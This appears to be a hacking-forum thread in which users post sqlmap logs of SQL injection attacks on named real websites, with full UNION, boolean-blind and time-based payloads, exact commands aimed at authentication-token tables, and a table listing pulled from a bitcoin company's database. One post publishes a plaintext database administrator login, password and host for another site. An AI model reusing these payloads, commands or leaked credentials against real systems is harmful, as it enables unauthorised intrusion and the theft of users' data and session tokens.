[18:57:38] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[18:57:38] [DEBUG] used the default behavior, running in batch mode
[18:57:38] [INFO] resuming back-end DBMS 'mysql'
[18:57:38] [DEBUG] resolving hostname 'sattaz.com'
[18:57:38] [INFO] testing connection to the target URL
[18:57:40] [DEBUG] declared web page charset 'utf-8'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: https://sattaz.com/guessing/kalyan' AND 3128=3128 AND 'bkro'='bkro
    Vector: AND [INFERENCE]

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: https://sattaz.com/guessing/kalyan' AND (SELECT 5069 FROM (SELECT(SLEEP(5)))bPdu) AND 'LtnB'='LtnB
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: https://sattaz.com/guessing/kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,0x5845694c6b505445616662576a574e794f727364726a4a63634d4f4d53744878534246766e455a50,0x716a6a7871),NULL,NULL,NULL-- -
    Vector:  UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,[QUERY],NULL,NULL,NULL-- -
---
[18:57:40] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12
[18:57:40] [INFO] fetching entries of column(s) 'id,sent,uid' for table 'tokens' in database 'sattaz'
[18:57:40] [DEBUG] resuming configuration option 'code' (200)
[18:57:40] [DEBUG] stripping ORDER BY clause from statement because it does not play well with UNION query SQL injection
[18:57:40] [PAYLOAD] kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,JSON_ARRAYAGG(CONCAT_WS(0x6d6a67777966,IFNULL(CAST(id AS NCHAR),0x20),IFNULL(CAST(sent AS NCHAR),0x20),IFNULL(CAST(uid AS NCHAR),0x20))),0x716a6a7871),NULL,NULL,NULL FROM sattaz.tokens WHERE id<=200-- -
[18:57:42] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[18:57:42] [PAYLOAD] kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,IFNULL(CAST(id AS NCHAR),0x20),0x6d6a67777966,IFNULL(CAST(sent AS NCHAR),0x20),0x6d6a67777966,IFNULL(CAST(uid AS NCHAR),0x20),0x716a6a7871),NULL,NULL,NULL FROM sattaz.tokens WHERE id<=200-- -
[18:57:44] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[18:57:44] [DEBUG] turning off NATIONAL CHARACTER casting
[18:57:44] [PAYLOAD] kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,IFNULL(CAST(id AS CHAR),0x20),0x6d6a67777966,IFNULL(CAST(sent AS CHAR),0x20),0x6d6a67777966,IFNULL(CAST(uid AS CHAR),0x20),0x716a6a7871),NULL,NULL,NULL FROM sattaz.tokens WHERE id<=200-- -
[18:57:46] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[18:57:46] [DEBUG] performed 3 queries in 5.63 seconds
[18:57:46] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
[18:57:46] [PAYLOAD] kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,JSON_ARRAYAGG(CONCAT_WS(0x6d6a67777966,IFNULL(CAST(id AS CHAR),0x20),IFNULL(CAST(sent AS CHAR),0x20),IFNULL(CAST(uid AS CHAR),0x20))),0x716a6a7871),NULL,NULL,NULL FROM sattaz.tokens WHERE id<=200-- -
[18:57:47] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[18:57:48] [PAYLOAD] kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,IFNULL(CAST(COUNT(*) AS CHAR),0x20),0x716a6a7871),NULL,NULL,NULL FROM sattaz.tokens WHERE id<=200-- -
[18:57:49] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[18:57:49] [WARNING] the SQL query provided does not return any output
[18:57:49] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[18:57:49] [INFO] fetching number of column(s) 'id,sent,uid' entries for table 'tokens' in database 'sattaz'
[18:57:49] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[18:57:49] [PAYLOAD] kalyan' AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.tokens WHERE id<=200),1,1))>51 AND 'offJ'='offJ
[18:57:51] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[18:57:51] [WARNING] unexpected HTTP code '500' detected. Will use (extra) validation step in similar cases
[18:57:51] [PAYLOAD] kalyan' AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.tokens WHERE id<=200),1,1))>48 AND 'offJ'='offJ
[18:57:52] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[18:57:52] [PAYLOAD] kalyan' AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.tokens WHERE id<=200),1,1))>9 AND 'offJ'='offJ
[18:57:54] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[18:57:54] [INFO] retrieved:
[18:57:54] [DEBUG] performed 3 queries in 4.85 seconds
[18:57:54] [PAYLOAD] kalyan' AND (SELECT 6218 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.tokens WHERE id<=200),1,1))>51,0,5)))))dUMp) AND 'jGfE'='jGfE
                                                                            [18:57:54] [WARNING] time-based comparison requires larger statistical model, please wait...................... (done)
[18:58:31] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[18:58:31] [PAYLOAD] kalyan' AND (SELECT 6218 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.tokens WHERE id<=200),1,1))>48,0,5)))))dUMp) AND 'jGfE'='jGfE
[18:58:31] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[18:58:32] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[18:58:32] [PAYLOAD] kalyan' AND (SELECT 6218 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.tokens WHERE id<=200),1,1))>9,0,5)))))dUMp) AND 'jGfE'='jGfE
[18:58:34] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[18:58:34] [INFO] retrieved:
[18:58:34] [DEBUG] performed 3 queries in 39.63 seconds
[18:58:34] [WARNING] unable to retrieve the number of column(s) 'id,sent,uid' entries for table 'tokens' in database 'sattaz'
[18:58:34] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 11 times
[18:58:34] [INFO] fetched data logged to text files under 'C:\Users\user\AppData\Local\sqlmap\output\sattaz.com'

[*] ending @ 18:58:34 /2025-09-29/

PS C:\Users\user\OneDrive\Desktop\sqlmapproject-sqlmap-71a12bf> py sqlmap.py -u "https://sattaz.com/guessing/kalyan" \ --random-agent --batch \ -D sattaz -T auth_tokens \ -C "id,uid,selector,hash,expires" \ --dump --where="id<=50" \ --threads=1 --delay=1 -v 3
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.9.9.4#dev}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:59:54 /2025-09-29/

[18:59:54] [DEBUG] cleaning up configuration parameters
[18:59:54] [DEBUG] setting the HTTP timeout
[18:59:54] [DEBUG] setting the HTTP User-Agent header
[18:59:54] [DEBUG] loading random HTTP User-Agent header(s) from file 'C:\Users\user\OneDrive\Desktop\sqlmapproject-sqlmap-71a12bf\data\txt\user-agents.txt'
[18:59:54] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36' from file 'C:\Users\user\OneDrive\Desktop\sqlmapproject-sqlmap-71a12bf\data\txt\user-agents.txt'
[18:59:54] [DEBUG] creating HTTP requests opener object
[18:59:54] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[18:59:54] [DEBUG] used the default behavior, running in batch mode
[18:59:54] [INFO] resuming back-end DBMS 'mysql'
[18:59:54] [DEBUG] resolving hostname 'sattaz.com'
[18:59:54] [INFO] testing connection to the target URL
[18:59:56] [DEBUG] declared web page charset 'utf-8'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: https://sattaz.com/guessing/kalyan' AND 3128=3128 AND 'bkro'='bkro
    Vector: AND [INFERENCE]

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: https://sattaz.com/guessing/kalyan' AND (SELECT 5069 FROM (SELECT(SLEEP(5)))bPdu) AND 'LtnB'='LtnB
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: https://sattaz.com/guessing/kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,0x5845694c6b505445616662576a574e794f727364726a4a63634d4f4d53744878534246766e455a50,0x716a6a7871),NULL,NULL,NULL-- -
    Vector:  UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,[QUERY],NULL,NULL,NULL-- -
---
[18:59:56] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12
[18:59:56] [INFO] fetching entries of column(s) '`hash`,expires,id,selector,uid' for table 'auth_tokens' in database 'sattaz'
[18:59:56] [DEBUG] resuming configuration option 'code' (200)
[18:59:56] [DEBUG] stripping ORDER BY clause from statement because it does not play well with UNION query SQL injection
[18:59:56] [PAYLOAD] kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,JSON_ARRAYAGG(CONCAT_WS(0x6d6a67777966,IFNULL(CAST(`hash` AS NCHAR),0x20),IFNULL(CAST(expires AS NCHAR),0x20),IFNULL(CAST(id AS NCHAR),0x20),IFNULL(CAST(selector AS NCHAR),0x20),IFNULL(CAST(uid AS NCHAR),0x20))),0x716a6a7871),NULL,NULL,NULL FROM sattaz.auth_tokens WHERE id<=50-- -
[18:59:58] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[18:59:58] [PAYLOAD] kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,IFNULL(CAST(`hash` AS NCHAR),0x20),0x6d6a67777966,IFNULL(CAST(expires AS NCHAR),0x20),0x6d6a67777966,IFNULL(CAST(id AS NCHAR),0x20),0x6d6a67777966,IFNULL(CAST(selector AS NCHAR),0x20),0x6d6a67777966,IFNULL(CAST(uid AS NCHAR),0x20),0x716a6a7871),NULL,NULL,NULL FROM sattaz.auth_tokens WHERE id<=50-- -
[19:00:00] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[19:00:00] [DEBUG] turning off NATIONAL CHARACTER casting
[19:00:00] [PAYLOAD] kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,IFNULL(CAST(`hash` AS CHAR),0x20),0x6d6a67777966,IFNULL(CAST(expires AS CHAR),0x20),0x6d6a67777966,IFNULL(CAST(id AS CHAR),0x20),0x6d6a67777966,IFNULL(CAST(selector AS CHAR),0x20),0x6d6a67777966,IFNULL(CAST(uid AS CHAR),0x20),0x716a6a7871),NULL,NULL,NULL FROM sattaz.auth_tokens WHERE id<=50-- -
[19:00:01] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[19:00:01] [DEBUG] performed 3 queries in 4.88 seconds
[19:00:01] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
[19:00:01] [PAYLOAD] kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,JSON_ARRAYAGG(CONCAT_WS(0x6d6a67777966,IFNULL(CAST(`hash` AS CHAR),0x20),IFNULL(CAST(expires AS CHAR),0x20),IFNULL(CAST(id AS CHAR),0x20),IFNULL(CAST(selector AS CHAR),0x20),IFNULL(CAST(uid AS CHAR),0x20))),0x716a6a7871),NULL,NULL,NULL FROM sattaz.auth_tokens WHERE id<=50-- -
[19:00:03] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[19:00:03] [PAYLOAD] kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,IFNULL(CAST(COUNT(*) AS CHAR),0x20),0x716a6a7871),NULL,NULL,NULL FROM sattaz.auth_tokens WHERE id<=50-- -
[19:00:04] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[19:00:05] [WARNING] the SQL query provided does not return any output
[19:00:05] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[19:00:05] [INFO] fetching number of column(s) '`hash`,expires,id,selector,uid' entries for table 'auth_tokens' in database 'sattaz'
[19:00:05] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[19:00:05] [PAYLOAD] kalyan' AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.auth_tokens WHERE id<=50),1,1))>51 AND 'qmgM'='qmgM
[19:00:06] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[19:00:06] [WARNING] unexpected HTTP code '500' detected. Will use (extra) validation step in similar cases
[19:00:06] [PAYLOAD] kalyan' AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.auth_tokens WHERE id<=50),1,1))>48 AND 'qmgM'='qmgM
[19:00:08] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[19:00:08] [PAYLOAD] kalyan' AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.auth_tokens WHERE id<=50),1,1))>9 AND 'qmgM'='qmgM
[19:00:09] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[19:00:09] [INFO] retrieved:
[19:00:09] [DEBUG] performed 3 queries in 4.82 seconds
[19:00:09] [PAYLOAD] kalyan' AND (SELECT 9719 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.auth_tokens WHERE id<=50),1,1))>51,0,5)))))aZeu) AND 'OxMW'='OxMW
                                                                            [19:00:09] [WARNING] time-based comparison requires larger statistical model, please wait...................... (done)
[19:00:46] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[19:00:46] [PAYLOAD] kalyan' AND (SELECT 9719 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.auth_tokens WHERE id<=50),1,1))>48,0,5)))))aZeu) AND 'OxMW'='OxMW
[19:00:46] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[19:00:48] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[19:00:48] [PAYLOAD] kalyan' AND (SELECT 9719 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.auth_tokens WHERE id<=50),1,1))>9,0,5)))))aZeu) AND 'OxMW'='OxMW
[19:00:49] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[19:00:49] [INFO] retrieved:
[19:00:49] [DEBUG] performed 3 queries in 39.80 seconds
[19:00:49] [WARNING] unable to retrieve the number of column(s) '`hash`,expires,id,selector,uid' entries for table 'auth_tokens' in database 'sattaz'
[19:00:49] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 11 times
[19:00:49] [INFO] fetched data logged to text files under 'C:\Users\user\AppData\Local\sqlmap\output\sattaz.com'

[*] ending @ 19:00:49 /2025-09-29/

PS C:\Users\user\OneDrive\Desktop\sqlmapproject-sqlmap-71a12bf> py sqlmap.py -u "https://sattaz.com/guessing/kalyan" \ --random-agent --batch \ -D sattaz -T tokens \ -C "id,uid,token" \ --dump --where="id<=50" \ --threads=1 --delay=1 -v 3
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.9.9.4#dev}
|_ -| . [,]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:01:10 /2025-09-29/

[19:01:10] [DEBUG] cleaning up configuration parameters
[19:01:10] [DEBUG] setting the HTTP timeout
[19:01:10] [DEBUG] setting the HTTP User-Agent header
[19:01:10] [DEBUG] loading random HTTP User-Agent header(s) from file 'C:\Users\user\OneDrive\Desktop\sqlmapproject-sqlmap-71a12bf\data\txt\user-agents.txt'
[19:01:10] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36' from file 'C:\Users\user\OneDrive\Desktop\sqlmapproject-sqlmap-71a12bf\data\txt\user-agents.txt'
[19:01:10] [DEBUG] creating HTTP requests opener object
[19:01:11] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[19:01:11] [DEBUG] used the default behavior, running in batch mode
[19:01:11] [INFO] resuming back-end DBMS 'mysql'
[19:01:11] [DEBUG] resolving hostname 'sattaz.com'
[19:01:11] [INFO] testing connection to the target URL
[19:01:13] [DEBUG] declared web page charset 'utf-8'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: https://sattaz.com/guessing/kalyan' AND 3128=3128 AND 'bkro'='bkro
    Vector: AND [INFERENCE]

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: https://sattaz.com/guessing/kalyan' AND (SELECT 5069 FROM (SELECT(SLEEP(5)))bPdu) AND 'LtnB'='LtnB
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: https://sattaz.com/guessing/kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,0x5845694c6b505445616662576a574e794f727364726a4a63634d4f4d53744878534246766e455a50,0x716a6a7871),NULL,NULL,NULL-- -
    Vector:  UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,[QUERY],NULL,NULL,NULL-- -
---
[19:01:13] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12
[19:01:13] [INFO] fetching entries of column(s) 'id,token,uid' for table 'tokens' in database 'sattaz'
[19:01:13] [DEBUG] resuming configuration option 'code' (200)
[19:01:13] [DEBUG] stripping ORDER BY clause from statement because it does not play well with UNION query SQL injection
[19:01:13] [PAYLOAD] kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,JSON_ARRAYAGG(CONCAT_WS(0x6d6a67777966,IFNULL(CAST(id AS NCHAR),0x20),IFNULL(CAST(token AS NCHAR),0x20),IFNULL(CAST(uid AS NCHAR),0x20))),0x716a6a7871),NULL,NULL,NULL FROM sattaz.tokens WHERE id<=50-- -
[19:01:15] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[19:01:15] [PAYLOAD] kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,IFNULL(CAST(id AS NCHAR),0x20),0x6d6a67777966,IFNULL(CAST(token AS NCHAR),0x20),0x6d6a67777966,IFNULL(CAST(uid AS NCHAR),0x20),0x716a6a7871),NULL,NULL,NULL FROM sattaz.tokens WHERE id<=50-- -
[19:01:17] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[19:01:17] [DEBUG] turning off NATIONAL CHARACTER casting
[19:01:17] [PAYLOAD] kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,IFNULL(CAST(id AS CHAR),0x20),0x6d6a67777966,IFNULL(CAST(token AS CHAR),0x20),0x6d6a67777966,IFNULL(CAST(uid AS CHAR),0x20),0x716a6a7871),NULL,NULL,NULL FROM sattaz.tokens WHERE id<=50-- -
[19:01:18] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[19:01:18] [DEBUG] performed 3 queries in 5.03 seconds
[19:01:18] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
[19:01:18] [PAYLOAD] kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,JSON_ARRAYAGG(CONCAT_WS(0x6d6a67777966,IFNULL(CAST(id AS CHAR),0x20),IFNULL(CAST(token AS CHAR),0x20),IFNULL(CAST(uid AS CHAR),0x20))),0x716a6a7871),NULL,NULL,NULL FROM sattaz.tokens WHERE id<=50-- -
[19:01:20] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[19:01:20] [PAYLOAD] kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,IFNULL(CAST(COUNT(*) AS CHAR),0x20),0x716a6a7871),NULL,NULL,NULL FROM sattaz.tokens WHERE id<=50-- -
[19:01:21] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[19:01:21] [WARNING] the SQL query provided does not return any output
[19:01:21] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[19:01:21] [INFO] fetching number of column(s) 'id,token,uid' entries for table 'tokens' in database 'sattaz'
[19:01:21] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[19:01:21] [PAYLOAD] kalyan' AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.tokens WHERE id<=50),1,1))>51 AND 'GkPv'='GkPv
[19:01:23] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[19:01:23] [WARNING] unexpected HTTP code '500' detected. Will use (extra) validation step in similar cases
[19:01:23] [PAYLOAD] kalyan' AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.tokens WHERE id<=50),1,1))>48 AND 'GkPv'='GkPv
[19:01:25] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[19:01:25] [PAYLOAD] kalyan' AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.tokens WHERE id<=50),1,1))>9 AND 'GkPv'='GkPv
[19:01:26] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[19:01:26] [INFO] retrieved:
[19:01:26] [DEBUG] performed 3 queries in 4.82 seconds
[19:01:26] [PAYLOAD] kalyan' AND (SELECT 8589 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.tokens WHERE id<=50),1,1))>51,0,5)))))ldgt) AND 'xlPJ'='xlPJ
                                                                            [19:01:26] [WARNING] time-based comparison requires larger statistical model, please wait...................... (done)
[19:02:04] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[19:02:04] [PAYLOAD] kalyan' AND (SELECT 8589 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.tokens WHERE id<=50),1,1))>48,0,5)))))ldgt) AND 'xlPJ'='xlPJ
[19:02:04] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[19:02:06] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[19:02:06] [PAYLOAD] kalyan' AND (SELECT 8589 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.tokens WHERE id<=50),1,1))>9,0,5)))))ldgt) AND 'xlPJ'='xlPJ
[19:02:07] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[19:02:07] [INFO] retrieved:
[19:02:07] [DEBUG] performed 3 queries in 41.04 seconds
[19:02:07] [WARNING] unable to retrieve the number of column(s) 'id,token,uid' entries for table 'tokens' in database 'sattaz'
[19:02:07] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 11 times
[19:02:07] [INFO] fetched data logged to text files under 'C:\Users\user\AppData\Local\sqlmap\output\sattaz.com'

[*] ending @ 19:02:07 /2025-09-29/

Посмотреть вложение 110701

Укажи --start=1 и пойдет дамп.

MrDark · 08.11.2025

Not sql injection, direct database access:

https://jisbackend.com/app/backend/db/database.py

It's about this site: https://jisparking.com/

admin:Chile2025@jisbackend.com:3306

2,9 billion lines.

MrDark · 15.11.2025

Cryptocurrency - bitcoin website.

Cathedra Bitcoin

Cathedra Bitcoin is a Bitcoin company that develops and operates world-class bitcoin mining infrastructure.

www.cathedra.com

Код:

(myenv) root@E02S29:~# sqlmap -u "https://www.cathedra.com/contact/index.php"   --data="comments=555&email=testing%40example.com&email_list=Email%20List&full_name=dTjdNQKi&g-r    ecaptcha-response=1&phone_number=555-666-0606&submit=Submit"   -p email_list    --level=3   --risk=3   --batch --tamper=space2comment --threads=10 -D cathedra_com --tables
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.9.10#pip}
|_ -| . [']     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state an    d federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 03:29:03 /2025-11-14/

[03:29:03] [INFO] loading tamper module 'space2comment'
[03:29:04] [INFO] resuming back-end DBMS 'mysql'
[03:29:04] [INFO] testing connection to the target URL
[03:29:06] [WARNING] potential CAPTCHA protection mechanism detected
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email_list (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: comments=555&email=testing@example.com&email_list=Email List' AND (SELECT 8722 FROM (SELECT(SLEEP(5)))mQpy) AND 'pGeg'='pGeg&full_name=dTjdNQKi&g-recaptcha-respon    se=1&phone_number=555-666-0606&submit=Submit
---
[03:29:06] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[03:29:06] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[03:29:06] [INFO] fetching tables for database: 'cathedra_com'
[03:29:06] [INFO] fetching number of tables for database 'cathedra_com'
multi-threading is considered unsafe in time-based data retrieval. Are you sure of your choice (breaking warranty) [y/N] N
[03:29:08] [INFO] resumed: 31
[03:29:08] [INFO] resumed: bCMS_applications
[03:29:08] [INFO] resumed: bCMS_applications_custom
[03:29:08] [INFO] resumed: bCMS_applications_listing
[03:29:08] [INFO] resumed: bCMS_categories
[03:29:08] [INFO] resumed: bCMS_changes
[03:29:08] [INFO] resumed: bCMS_comments
[03:29:08] [INFO] resumed: bCMS_contents
[03:29:08] [INFO] resumed: bCMS_contents_to_categories
[03:29:08] [INFO] resumed: bCMS_contents_to_structures
[03:29:08] [INFO] resumed: bCMS_elements
[03:29:08] [INFO] resumed: bCMS_gallery_albums
[03:29:08] [INFO] resumed: bCMS_gallery_images
[03:29:08] [INFO] resumed: bCMS_hootsuite_access_tokens
[03:29:08] [INFO] resumed: bCMS_pages
[03:29:08] [INFO] resumed: bCMS_parameters
[03:29:08] [INFO] resumed: bCMS_permissions
[03:29:08] [INFO] resumed: bCMS_related_links
[03:29:08] [INFO] resumed: bCMS_social_media_messages
[03:29:08] [INFO] resumed: bCMS_structures
[03:29:08] [INFO] resumed: bCMS_click_throughs
[03:29:08] [INFO] resumed: bCRM_contacts
[03:29:08] [INFO] resumed: bCRM_contacts_to_groups
[03:29:08] [INFO] resumed: bCRM_details
[03:29:08] [INFO] resumed: bCRM_disseminations
